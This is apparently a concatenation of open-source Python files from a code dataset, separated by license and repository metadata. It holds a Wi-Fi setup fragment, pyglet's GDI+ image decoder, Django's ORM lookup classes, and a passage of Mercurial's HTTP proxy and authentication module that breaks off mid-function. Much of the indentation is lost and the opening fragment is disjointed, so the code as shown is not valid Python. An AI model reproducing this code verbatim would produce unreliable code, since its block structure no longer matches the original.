                # wpa_passphrase returns bytes; decode before writing to the text-mode file
                conf = subprocess.check_output(["wpa_passphrase", ssid, passphrase]).decode()
                with open(conf_path, "w") as conf_file:
                    conf_file.write(conf)
except subprocess.CalledProcessError as process_error:
logging.warning(process_error)
cmd = ["systemctl", "enable", "wpa_supplicant@{0}".format(link)]
chroot_run(cmd)
# cmd = ["systemctl", "enable", "dhcpcd@{0}".format(link)]
# chroot_run(cmd)
if __name__ == '__main__':
def _(x): return x
DEST_DIR="/"
setup()
|
mit
|
google-code-export/pyglet
|
pyglet/image/codecs/gdiplus.py
|
28
|
12535
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: pil.py 163 2006-11-13 04:15:46Z Alex.Holkner $'
from ctypes import *
from pyglet.com import IUnknown
from pyglet.gl import *
from pyglet.image import *
from pyglet.image.codecs import *
from pyglet.libs.win32.constants import *
from pyglet.libs.win32.types import *
from pyglet.libs.win32 import _kernel32 as kernel32
ole32 = windll.ole32
gdiplus = windll.gdiplus
LPSTREAM = c_void_p
REAL = c_float
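# GDI+ PixelFormat constants (values as defined in the GDI+ headers)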
PixelFormat1bppIndexed = 196865
PixelFormat4bppIndexed = 197634
PixelFormat8bppIndexed = 198659
PixelFormat16bppGrayScale = 1052676
PixelFormat16bppRGB555 = 135173
PixelFormat16bppRGB565 = 135174
PixelFormat16bppARGB1555 = 397319
PixelFormat24bppRGB = 137224
PixelFormat32bppRGB = 139273
PixelFormat32bppARGB = 2498570
PixelFormat32bppPARGB = 925707
PixelFormat48bppRGB = 1060876
PixelFormat64bppARGB = 3424269
PixelFormat64bppPARGB = 29622286
PixelFormatMax = 15
ImageLockModeRead = 1
ImageLockModeWrite = 2
ImageLockModeUserInputBuf = 4
class GdiplusStartupInput(Structure):
_fields_ = [
('GdiplusVersion', c_uint32),
('DebugEventCallback', c_void_p),
('SuppressBackgroundThread', BOOL),
('SuppressExternalCodecs', BOOL)
]
class GdiplusStartupOutput(Structure):
    _fields_ = [
('NotificationHookProc', c_void_p),
('NotificationUnhookProc', c_void_p)
]
class BitmapData(Structure):
_fields_ = [
('Width', c_uint),
('Height', c_uint),
('Stride', c_int),
('PixelFormat', c_int),
('Scan0', POINTER(c_byte)),
('Reserved', POINTER(c_uint))
]
class Rect(Structure):
_fields_ = [
('X', c_int),
('Y', c_int),
('Width', c_int),
('Height', c_int)
]
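# GDI+ property tag for per-frame delay in animated GIFs (units: hundredths of a second)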
PropertyTagFrameDelay = 0x5100
class PropertyItem(Structure):
_fields_ = [
('id', c_uint),
('length', c_ulong),
('type', c_short),
('value', c_void_p)
]
INT_PTR = POINTER(INT)
UINT_PTR = POINTER(UINT)
ole32.CreateStreamOnHGlobal.argtypes = [HGLOBAL, BOOL, LPSTREAM]
gdiplus.GdipBitmapLockBits.restype = c_int
gdiplus.GdipBitmapLockBits.argtypes = [c_void_p, c_void_p, UINT, c_int, c_void_p]
gdiplus.GdipBitmapUnlockBits.restype = c_int
gdiplus.GdipBitmapUnlockBits.argtypes = [c_void_p, c_void_p]
gdiplus.GdipCloneStringFormat.restype = c_int
gdiplus.GdipCloneStringFormat.argtypes = [c_void_p, c_void_p]
gdiplus.GdipCreateBitmapFromScan0.restype = c_int
gdiplus.GdipCreateBitmapFromScan0.argtypes = [c_int, c_int, c_int, c_int, POINTER(BYTE), c_void_p]
gdiplus.GdipCreateBitmapFromStream.restype = c_int
gdiplus.GdipCreateBitmapFromStream.argtypes = [c_void_p, c_void_p]
gdiplus.GdipCreateFont.restype = c_int
gdiplus.GdipCreateFont.argtypes = [c_void_p, REAL, INT, c_int, c_void_p]
gdiplus.GdipCreateFontFamilyFromName.restype = c_int
gdiplus.GdipCreateFontFamilyFromName.argtypes = [c_wchar_p, c_void_p, c_void_p]
gdiplus.GdipCreateMatrix.restype = None
gdiplus.GdipCreateMatrix.argtypes = [c_void_p]
gdiplus.GdipCreateSolidFill.restype = c_int
gdiplus.GdipCreateSolidFill.argtypes = [c_int, c_void_p] # ARGB
gdiplus.GdipDisposeImage.restype = c_int
gdiplus.GdipDisposeImage.argtypes = [c_void_p]
gdiplus.GdipDrawString.restype = c_int
gdiplus.GdipDrawString.argtypes = [c_void_p, c_wchar_p, c_int, c_void_p, c_void_p, c_void_p, c_void_p]
gdiplus.GdipFlush.restype = c_int
gdiplus.GdipFlush.argtypes = [c_void_p, c_int]
gdiplus.GdipGetImageDimension.restype = c_int
gdiplus.GdipGetImageDimension.argtypes = [c_void_p, POINTER(REAL), POINTER(REAL)]
gdiplus.GdipGetImageGraphicsContext.restype = c_int
gdiplus.GdipGetImageGraphicsContext.argtypes = [c_void_p, c_void_p]
gdiplus.GdipGetImagePixelFormat.restype = c_int
gdiplus.GdipGetImagePixelFormat.argtypes = [c_void_p, c_void_p]
gdiplus.GdipGetPropertyItem.restype = c_int
gdiplus.GdipGetPropertyItem.argtypes = [c_void_p, c_uint, c_uint, c_void_p]
gdiplus.GdipGetPropertyItemSize.restype = c_int
gdiplus.GdipGetPropertyItemSize.argtypes = [c_void_p, c_uint, UINT_PTR]
gdiplus.GdipGraphicsClear.restype = c_int
gdiplus.GdipGraphicsClear.argtypes = [c_void_p, c_int] # ARGB
gdiplus.GdipImageGetFrameCount.restype = c_int
gdiplus.GdipImageGetFrameCount.argtypes = [c_void_p, c_void_p, UINT_PTR]
gdiplus.GdipImageGetFrameDimensionsCount.restype = c_int
gdiplus.GdipImageGetFrameDimensionsCount.argtypes = [c_void_p, UINT_PTR]
gdiplus.GdipImageGetFrameDimensionsList.restype = c_int
gdiplus.GdipImageGetFrameDimensionsList.argtypes = [c_void_p, c_void_p, UINT]
gdiplus.GdipImageSelectActiveFrame.restype = c_int
gdiplus.GdipImageSelectActiveFrame.argtypes = [c_void_p, c_void_p, UINT]
gdiplus.GdipMeasureString.restype = c_int
gdiplus.GdipMeasureString.argtypes = [c_void_p, c_wchar_p, c_int, c_void_p, c_void_p, c_void_p, c_void_p, INT_PTR, INT_PTR]
gdiplus.GdipNewPrivateFontCollection.restype = c_int
gdiplus.GdipNewPrivateFontCollection.argtypes = [c_void_p]
gdiplus.GdipPrivateAddMemoryFont.restype = c_int
gdiplus.GdipPrivateAddMemoryFont.argtypes = [c_void_p, c_void_p, c_int]
gdiplus.GdipSetPageUnit.restype = c_int
gdiplus.GdipSetPageUnit.argtypes = [c_void_p, c_int]
gdiplus.GdipSetStringFormatFlags.restype = c_int
gdiplus.GdipSetStringFormatFlags.argtypes = [c_void_p, c_int]
gdiplus.GdipSetTextRenderingHint.restype = c_int
gdiplus.GdipSetTextRenderingHint.argtypes = [c_void_p, c_int]
gdiplus.GdipStringFormatGetGenericTypographic.restype = c_int
gdiplus.GdipStringFormatGetGenericTypographic.argtypes = [c_void_p]
gdiplus.GdiplusShutdown.restype = None
gdiplus.GdiplusShutdown.argtypes = [POINTER(ULONG)]
gdiplus.GdiplusStartup.restype = c_int
gdiplus.GdiplusStartup.argtypes = [c_void_p, c_void_p, c_void_p]
class GDIPlusDecoder(ImageDecoder):
def get_file_extensions(self):
return ['.bmp', '.gif', '.jpg', '.jpeg', '.exif', '.png', '.tif',
'.tiff']
def get_animation_file_extensions(self):
# TIFF also supported as a multi-page image; but that's not really an
# animation, is it?
return ['.gif']
def _load_bitmap(self, file, filename):
data = file.read()
# Create a HGLOBAL with image data
hglob = kernel32.GlobalAlloc(GMEM_MOVEABLE, len(data))
ptr = kernel32.GlobalLock(hglob)
memmove(ptr, data, len(data))
kernel32.GlobalUnlock(hglob)
# Create IStream for the HGLOBAL
self.stream = IUnknown()
ole32.CreateStreamOnHGlobal(hglob, True, byref(self.stream))
# Load image from stream
bitmap = c_void_p()
status = gdiplus.GdipCreateBitmapFromStream(self.stream, byref(bitmap))
if status != 0:
self.stream.Release()
raise ImageDecodeException(
'GDI+ cannot load %r' % (filename or file))
return bitmap
def _get_image(self, bitmap):
# Get size of image (Bitmap subclasses Image)
width = REAL()
height = REAL()
gdiplus.GdipGetImageDimension(bitmap, byref(width), byref(height))
width = int(width.value)
height = int(height.value)
# Get image pixel format
pf = c_int()
gdiplus.GdipGetImagePixelFormat(bitmap, byref(pf))
pf = pf.value
# Reverse from what's documented because of Intel little-endianness.
format = 'BGRA'
if pf == PixelFormat24bppRGB:
format = 'BGR'
elif pf == PixelFormat32bppRGB:
pass
elif pf == PixelFormat32bppARGB:
pass
elif pf in (PixelFormat16bppARGB1555, PixelFormat32bppPARGB,
PixelFormat64bppARGB, PixelFormat64bppPARGB):
pf = PixelFormat32bppARGB
else:
format = 'BGR'
pf = PixelFormat24bppRGB
# Lock pixel data in best format
rect = Rect()
rect.X = 0
rect.Y = 0
rect.Width = width
rect.Height = height
bitmap_data = BitmapData()
gdiplus.GdipBitmapLockBits(bitmap,
byref(rect), ImageLockModeRead, pf, byref(bitmap_data))
# Create buffer for RawImage
buffer = create_string_buffer(bitmap_data.Stride * height)
memmove(buffer, bitmap_data.Scan0, len(buffer))
# Unlock data
gdiplus.GdipBitmapUnlockBits(bitmap, byref(bitmap_data))
return ImageData(width, height, format, buffer, -bitmap_data.Stride)
def _delete_bitmap(self, bitmap):
# Release image and stream
gdiplus.GdipDisposeImage(bitmap)
self.stream.Release()
def decode(self, file, filename):
bitmap = self._load_bitmap(file, filename)
image = self._get_image(bitmap)
self._delete_bitmap(bitmap)
return image
def decode_animation(self, file, filename):
bitmap = self._load_bitmap(file, filename)
dimension_count = c_uint()
gdiplus.GdipImageGetFrameDimensionsCount(bitmap, byref(dimension_count))
if dimension_count.value < 1:
self._delete_bitmap(bitmap)
raise ImageDecodeException('Image has no frame dimensions')
# XXX Make sure this dimension is time?
dimensions = (c_void_p * dimension_count.value)()
gdiplus.GdipImageGetFrameDimensionsList(bitmap, dimensions,
dimension_count.value)
frame_count = c_uint()
gdiplus.GdipImageGetFrameCount(bitmap, dimensions, byref(frame_count))
prop_id = PropertyTagFrameDelay
prop_size = c_uint()
gdiplus.GdipGetPropertyItemSize(bitmap, prop_id, byref(prop_size))
prop_buffer = c_buffer(prop_size.value)
prop_item = cast(prop_buffer, POINTER(PropertyItem)).contents
gdiplus.GdipGetPropertyItem(bitmap, prop_id, prop_size.value,
prop_buffer)
n_delays = prop_item.length // sizeof(c_long)
delays = cast(prop_item.value, POINTER(c_long * n_delays)).contents
frames = []
for i in range(frame_count.value):
gdiplus.GdipImageSelectActiveFrame(bitmap, dimensions, i)
image = self._get_image(bitmap)
delay = delays[i]
if delay <= 1:
delay = 10
frames.append(AnimationFrame(image, delay/100.))
self._delete_bitmap(bitmap)
return Animation(frames)
def get_decoders():
return [GDIPlusDecoder()]
def get_encoders():
return []
def init():
token = c_ulong()
startup_in = GdiplusStartupInput()
startup_in.GdiplusVersion = 1
startup_out = GdiplusStartupOutput()
gdiplus.GdiplusStartup(byref(token), byref(startup_in), byref(startup_out))
# Shutdown later?
# gdiplus.GdiplusShutdown(token)
init()
|
bsd-3-clause
|
aidanlister/django
|
django/db/models/lookups.py
|
194
|
16328
|
import inspect
from copy import copy
from django.utils.functional import cached_property
from django.utils.six.moves import range
from .query_utils import QueryWrapper
class RegisterLookupMixin(object):
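    """Mixin that lets fields, transforms and expressions register and resolve custom lookups and transforms."""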
def _get_lookup(self, lookup_name):
try:
return self.class_lookups[lookup_name]
except KeyError:
# To allow for inheritance, check parent class' class_lookups.
for parent in inspect.getmro(self.__class__):
if 'class_lookups' not in parent.__dict__:
continue
if lookup_name in parent.class_lookups:
return parent.class_lookups[lookup_name]
except AttributeError:
# This class didn't have any class_lookups
pass
return None
def get_lookup(self, lookup_name):
found = self._get_lookup(lookup_name)
if found is None and hasattr(self, 'output_field'):
return self.output_field.get_lookup(lookup_name)
if found is not None and not issubclass(found, Lookup):
return None
return found
def get_transform(self, lookup_name):
found = self._get_lookup(lookup_name)
if found is None and hasattr(self, 'output_field'):
return self.output_field.get_transform(lookup_name)
if found is not None and not issubclass(found, Transform):
return None
return found
@classmethod
def register_lookup(cls, lookup):
if 'class_lookups' not in cls.__dict__:
cls.class_lookups = {}
cls.class_lookups[lookup.lookup_name] = lookup
return lookup
@classmethod
def _unregister_lookup(cls, lookup):
"""
Removes given lookup from cls lookups. Meant to be used in
tests only.
"""
del cls.class_lookups[lookup.lookup_name]
class Transform(RegisterLookupMixin):
bilateral = False
def __init__(self, lhs, lookups):
self.lhs = lhs
self.init_lookups = lookups[:]
def as_sql(self, compiler, connection):
raise NotImplementedError
@cached_property
def output_field(self):
return self.lhs.output_field
def copy(self):
return copy(self)
def relabeled_clone(self, relabels):
copy = self.copy()
copy.lhs = self.lhs.relabeled_clone(relabels)
return copy
def get_group_by_cols(self):
return self.lhs.get_group_by_cols()
def get_bilateral_transforms(self):
if hasattr(self.lhs, 'get_bilateral_transforms'):
bilateral_transforms = self.lhs.get_bilateral_transforms()
else:
bilateral_transforms = []
if self.bilateral:
bilateral_transforms.append((self.__class__, self.init_lookups))
return bilateral_transforms
@cached_property
def contains_aggregate(self):
return self.lhs.contains_aggregate
class Lookup(RegisterLookupMixin):
lookup_name = None
def __init__(self, lhs, rhs):
self.lhs, self.rhs = lhs, rhs
self.rhs = self.get_prep_lookup()
if hasattr(self.lhs, 'get_bilateral_transforms'):
bilateral_transforms = self.lhs.get_bilateral_transforms()
else:
bilateral_transforms = []
if bilateral_transforms:
            # Warn the user as early as possible if they are trying to apply
            # a bilateral transformation to a nested QuerySet: that won't work.
            # QuerySet is imported here to avoid a circular import.
from django.db.models.query import QuerySet
if isinstance(rhs, QuerySet):
raise NotImplementedError("Bilateral transformations on nested querysets are not supported.")
self.bilateral_transforms = bilateral_transforms
def apply_bilateral_transforms(self, value):
for transform, lookups in self.bilateral_transforms:
value = transform(value, lookups)
return value
def batch_process_rhs(self, compiler, connection, rhs=None):
if rhs is None:
rhs = self.rhs
if self.bilateral_transforms:
sqls, sqls_params = [], []
for p in rhs:
value = QueryWrapper('%s',
[self.lhs.output_field.get_db_prep_value(p, connection)])
value = self.apply_bilateral_transforms(value)
sql, sql_params = compiler.compile(value)
sqls.append(sql)
sqls_params.extend(sql_params)
else:
params = self.lhs.output_field.get_db_prep_lookup(
self.lookup_name, rhs, connection, prepared=True)
sqls, sqls_params = ['%s'] * len(params), params
return sqls, sqls_params
def get_prep_lookup(self):
return self.lhs.output_field.get_prep_lookup(self.lookup_name, self.rhs)
def get_db_prep_lookup(self, value, connection):
return (
'%s', self.lhs.output_field.get_db_prep_lookup(
self.lookup_name, value, connection, prepared=True))
def process_lhs(self, compiler, connection, lhs=None):
lhs = lhs or self.lhs
return compiler.compile(lhs)
def process_rhs(self, compiler, connection):
value = self.rhs
if self.bilateral_transforms:
if self.rhs_is_direct_value():
# Do not call get_db_prep_lookup here as the value will be
# transformed before being used for lookup
value = QueryWrapper("%s",
[self.lhs.output_field.get_db_prep_value(value, connection)])
value = self.apply_bilateral_transforms(value)
        # For historical reasons there are a couple of different ways to
        # produce SQL here: an object with get_compiler is likely a Query
        # instance, one with _as_sql is a QuerySet, and one with as_sql is
        # just something that knows how to compile itself. Finally, the
        # value may also be a plain Python value.
if hasattr(value, 'get_compiler'):
value = value.get_compiler(connection=connection)
if hasattr(value, 'as_sql'):
sql, params = compiler.compile(value)
return '(' + sql + ')', params
if hasattr(value, '_as_sql'):
sql, params = value._as_sql(connection=connection)
return '(' + sql + ')', params
else:
return self.get_db_prep_lookup(value, connection)
def rhs_is_direct_value(self):
        return not (
hasattr(self.rhs, 'as_sql') or
hasattr(self.rhs, '_as_sql') or
hasattr(self.rhs, 'get_compiler'))
def relabeled_clone(self, relabels):
new = copy(self)
new.lhs = new.lhs.relabeled_clone(relabels)
if hasattr(new.rhs, 'relabeled_clone'):
new.rhs = new.rhs.relabeled_clone(relabels)
return new
def get_group_by_cols(self):
cols = self.lhs.get_group_by_cols()
if hasattr(self.rhs, 'get_group_by_cols'):
cols.extend(self.rhs.get_group_by_cols())
return cols
def as_sql(self, compiler, connection):
raise NotImplementedError
@cached_property
def contains_aggregate(self):
return self.lhs.contains_aggregate or getattr(self.rhs, 'contains_aggregate', False)
class BuiltinLookup(Lookup):
def process_lhs(self, compiler, connection, lhs=None):
lhs_sql, params = super(BuiltinLookup, self).process_lhs(
compiler, connection, lhs)
field_internal_type = self.lhs.output_field.get_internal_type()
db_type = self.lhs.output_field.db_type(connection=connection)
lhs_sql = connection.ops.field_cast_sql(
db_type, field_internal_type) % lhs_sql
lhs_sql = connection.ops.lookup_cast(self.lookup_name, field_internal_type) % lhs_sql
return lhs_sql, params
def as_sql(self, compiler, connection):
lhs_sql, params = self.process_lhs(compiler, connection)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
params.extend(rhs_params)
rhs_sql = self.get_rhs_op(connection, rhs_sql)
return '%s %s' % (lhs_sql, rhs_sql), params
def get_rhs_op(self, connection, rhs):
return connection.operators[self.lookup_name] % rhs
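# Registry of the built-in lookups, keyed by lookup_name; populated as each lookup class below is defined.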
default_lookups = {}
class Exact(BuiltinLookup):
lookup_name = 'exact'
default_lookups['exact'] = Exact
class IExact(BuiltinLookup):
lookup_name = 'iexact'
def process_rhs(self, qn, connection):
rhs, params = super(IExact, self).process_rhs(qn, connection)
if params:
params[0] = connection.ops.prep_for_iexact_query(params[0])
return rhs, params
default_lookups['iexact'] = IExact
class GreaterThan(BuiltinLookup):
lookup_name = 'gt'
default_lookups['gt'] = GreaterThan
class GreaterThanOrEqual(BuiltinLookup):
lookup_name = 'gte'
default_lookups['gte'] = GreaterThanOrEqual
class LessThan(BuiltinLookup):
lookup_name = 'lt'
default_lookups['lt'] = LessThan
class LessThanOrEqual(BuiltinLookup):
lookup_name = 'lte'
default_lookups['lte'] = LessThanOrEqual
class In(BuiltinLookup):
lookup_name = 'in'
def process_rhs(self, compiler, connection):
if self.rhs_is_direct_value():
# rhs should be an iterable, we use batch_process_rhs
# to prepare/transform those values
rhs = list(self.rhs)
if not rhs:
from django.db.models.sql.datastructures import EmptyResultSet
raise EmptyResultSet
sqls, sqls_params = self.batch_process_rhs(compiler, connection, rhs)
placeholder = '(' + ', '.join(sqls) + ')'
return (placeholder, sqls_params)
else:
return super(In, self).process_rhs(compiler, connection)
def get_rhs_op(self, connection, rhs):
return 'IN %s' % rhs
def as_sql(self, compiler, connection):
max_in_list_size = connection.ops.max_in_list_size()
if self.rhs_is_direct_value() and (max_in_list_size and
len(self.rhs) > max_in_list_size):
# This is a special case for Oracle which limits the number of elements
# which can appear in an 'IN' clause.
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.batch_process_rhs(compiler, connection)
in_clause_elements = ['(']
params = []
for offset in range(0, len(rhs_params), max_in_list_size):
if offset > 0:
in_clause_elements.append(' OR ')
in_clause_elements.append('%s IN (' % lhs)
params.extend(lhs_params)
sqls = rhs[offset: offset + max_in_list_size]
sqls_params = rhs_params[offset: offset + max_in_list_size]
param_group = ', '.join(sqls)
in_clause_elements.append(param_group)
in_clause_elements.append(')')
params.extend(sqls_params)
in_clause_elements.append(')')
return ''.join(in_clause_elements), params
else:
return super(In, self).as_sql(compiler, connection)
default_lookups['in'] = In
class PatternLookup(BuiltinLookup):
def get_rhs_op(self, connection, rhs):
# Assume we are in startswith. We need to produce SQL like:
# col LIKE %s, ['thevalue%']
        # For Python values we can (and should) do that directly in Python,
        # but if the value is, for example, a reference to another column,
        # then we need to add the % pattern match to the lookup by something like
        # col LIKE othercol || '%%'
# So, for Python values we don't need any special pattern, but for
# SQL reference values or SQL transformations we need the correct
# pattern added.
if (hasattr(self.rhs, 'get_compiler') or hasattr(self.rhs, 'as_sql')
or hasattr(self.rhs, '_as_sql') or self.bilateral_transforms):
pattern = connection.pattern_ops[self.lookup_name].format(connection.pattern_esc)
return pattern.format(rhs)
else:
return super(PatternLookup, self).get_rhs_op(connection, rhs)
class Contains(PatternLookup):
lookup_name = 'contains'
def process_rhs(self, qn, connection):
rhs, params = super(Contains, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['contains'] = Contains
class IContains(Contains):
lookup_name = 'icontains'
default_lookups['icontains'] = IContains
class StartsWith(PatternLookup):
lookup_name = 'startswith'
def process_rhs(self, qn, connection):
rhs, params = super(StartsWith, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['startswith'] = StartsWith
class IStartsWith(PatternLookup):
lookup_name = 'istartswith'
def process_rhs(self, qn, connection):
rhs, params = super(IStartsWith, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['istartswith'] = IStartsWith
class EndsWith(PatternLookup):
lookup_name = 'endswith'
def process_rhs(self, qn, connection):
rhs, params = super(EndsWith, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['endswith'] = EndsWith
class IEndsWith(PatternLookup):
lookup_name = 'iendswith'
def process_rhs(self, qn, connection):
rhs, params = super(IEndsWith, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['iendswith'] = IEndsWith
class Between(BuiltinLookup):
def get_rhs_op(self, connection, rhs):
return "BETWEEN %s AND %s" % (rhs, rhs)
class Range(BuiltinLookup):
lookup_name = 'range'
def get_rhs_op(self, connection, rhs):
return "BETWEEN %s AND %s" % (rhs[0], rhs[1])
def process_rhs(self, compiler, connection):
if self.rhs_is_direct_value():
# rhs should be an iterable of 2 values, we use batch_process_rhs
# to prepare/transform those values
return self.batch_process_rhs(compiler, connection)
else:
return super(Range, self).process_rhs(compiler, connection)
default_lookups['range'] = Range
class IsNull(BuiltinLookup):
lookup_name = 'isnull'
def as_sql(self, compiler, connection):
sql, params = compiler.compile(self.lhs)
if self.rhs:
return "%s IS NULL" % sql, params
else:
return "%s IS NOT NULL" % sql, params
default_lookups['isnull'] = IsNull
class Search(BuiltinLookup):
lookup_name = 'search'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
sql_template = connection.ops.fulltext_search_sql(field_name=lhs)
return sql_template, lhs_params + rhs_params
default_lookups['search'] = Search
class Regex(BuiltinLookup):
lookup_name = 'regex'
def as_sql(self, compiler, connection):
if self.lookup_name in connection.operators:
return super(Regex, self).as_sql(compiler, connection)
else:
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
sql_template = connection.ops.regex_lookup(self.lookup_name)
return sql_template % (lhs, rhs), lhs_params + rhs_params
default_lookups['regex'] = Regex
class IRegex(Regex):
lookup_name = 'iregex'
default_lookups['iregex'] = IRegex
|
bsd-3-clause
|
apixandru/intellij-community
|
plugins/hg4idea/testData/bin/mercurial/url.py
|
91
|
17489
|
# url.py - HTTP handling for mercurial
#
# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
# Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import urllib, urllib2, httplib, os, socket, cStringIO
from i18n import _
import keepalive, util, sslutil
import httpconnection as httpconnectionmod
class passwordmgr(urllib2.HTTPPasswordMgrWithDefaultRealm):
def __init__(self, ui):
urllib2.HTTPPasswordMgrWithDefaultRealm.__init__(self)
self.ui = ui
def find_user_password(self, realm, authuri):
authinfo = urllib2.HTTPPasswordMgrWithDefaultRealm.find_user_password(
self, realm, authuri)
user, passwd = authinfo
if user and passwd:
self._writedebug(user, passwd)
return (user, passwd)
if not user or not passwd:
res = httpconnectionmod.readauthforuri(self.ui, authuri, user)
if res:
group, auth = res
user, passwd = auth.get('username'), auth.get('password')
self.ui.debug("using auth.%s.* for authentication\n" % group)
if not user or not passwd:
if not self.ui.interactive():
raise util.Abort(_('http authorization required'))
self.ui.write(_("http authorization required\n"))
self.ui.write(_("realm: %s\n") % realm)
if user:
self.ui.write(_("user: %s\n") % user)
else:
user = self.ui.prompt(_("user:"), default=None)
if not passwd:
passwd = self.ui.getpass()
self.add_password(realm, authuri, user, passwd)
self._writedebug(user, passwd)
return (user, passwd)
def _writedebug(self, user, passwd):
msg = _('http auth: user %s, password %s\n')
self.ui.debug(msg % (user, passwd and '*' * len(passwd) or 'not set'))
def find_stored_password(self, authuri):
return urllib2.HTTPPasswordMgrWithDefaultRealm.find_user_password(
self, None, authuri)
class proxyhandler(urllib2.ProxyHandler):
def __init__(self, ui):
proxyurl = ui.config("http_proxy", "host") or os.getenv('http_proxy')
# XXX proxyauthinfo = None
if proxyurl:
# proxy can be proper url or host[:port]
if not (proxyurl.startswith('http:') or
proxyurl.startswith('https:')):
proxyurl = 'http://' + proxyurl + '/'
proxy = util.url(proxyurl)
if not proxy.user:
proxy.user = ui.config("http_proxy", "user")
proxy.passwd = ui.config("http_proxy", "passwd")
# see if we should use a proxy for this url
no_list = ["localhost", "127.0.0.1"]
no_list.extend([p.lower() for
p in ui.configlist("http_proxy", "no")])
no_list.extend([p.strip().lower() for
p in os.getenv("no_proxy", '').split(',')
if p.strip()])
# "http_proxy.always" config is for running tests on localhost
if ui.configbool("http_proxy", "always"):
self.no_list = []
else:
self.no_list = no_list
proxyurl = str(proxy)
proxies = {'http': proxyurl, 'https': proxyurl}
ui.debug('proxying through http://%s:%s\n' %
(proxy.host, proxy.port))
else:
proxies = {}
# urllib2 takes proxy values from the environment and those
# will take precedence if found. So, if there's a config entry
# defining a proxy, drop the environment ones
if ui.config("http_proxy", "host"):
for env in ["HTTP_PROXY", "http_proxy", "no_proxy"]:
try:
if env in os.environ:
del os.environ[env]
except OSError:
pass
urllib2.ProxyHandler.__init__(self, proxies)
self.ui = ui
def proxy_open(self, req, proxy, type_):
host = req.get_host().split(':')[0]
if host in self.no_list:
return None
# work around a bug in Python < 2.4.2
# (it leaves a "\n" at the end of Proxy-authorization headers)
baseclass = req.__class__
class _request(baseclass):
def add_header(self, key, val):
if key.lower() == 'proxy-authorization':
val = val.strip()
return baseclass.add_header(self, key, val)
req.__class__ = _request
return urllib2.ProxyHandler.proxy_open(self, req, proxy, type_)
def _gen_sendfile(orgsend):
def _sendfile(self, data):
# send a file
if isinstance(data, httpconnectionmod.httpsendfile):
# if auth required, some data sent twice, so rewind here
data.seek(0)
for chunk in util.filechunkiter(data):
orgsend(self, chunk)
else:
orgsend(self, data)
return _sendfile
has_https = util.safehasattr(urllib2, 'HTTPSHandler')
if has_https:
try:
_create_connection = socket.create_connection
except AttributeError:
_GLOBAL_DEFAULT_TIMEOUT = object()
def _create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
# lifted from Python 2.6
msg = "getaddrinfo returns an empty list"
host, port = address
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except socket.error, msg:
if sock is not None:
sock.close()
raise socket.error(msg)
class httpconnection(keepalive.HTTPConnection):
# must be able to send big bundle as stream.
send = _gen_sendfile(keepalive.HTTPConnection.send)
def connect(self):
if has_https and self.realhostport: # use CONNECT proxy
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
if _generic_proxytunnel(self):
# we do not support client X.509 certificates
self.sock = sslutil.ssl_wrap_socket(self.sock, None, None)
else:
keepalive.HTTPConnection.connect(self)
def getresponse(self):
proxyres = getattr(self, 'proxyres', None)
if proxyres:
if proxyres.will_close:
self.close()
self.proxyres = None
return proxyres
return keepalive.HTTPConnection.getresponse(self)
# general transaction handler to support different ways to handle
# HTTPS proxying before and after Python 2.6.3.
def _generic_start_transaction(handler, h, req):
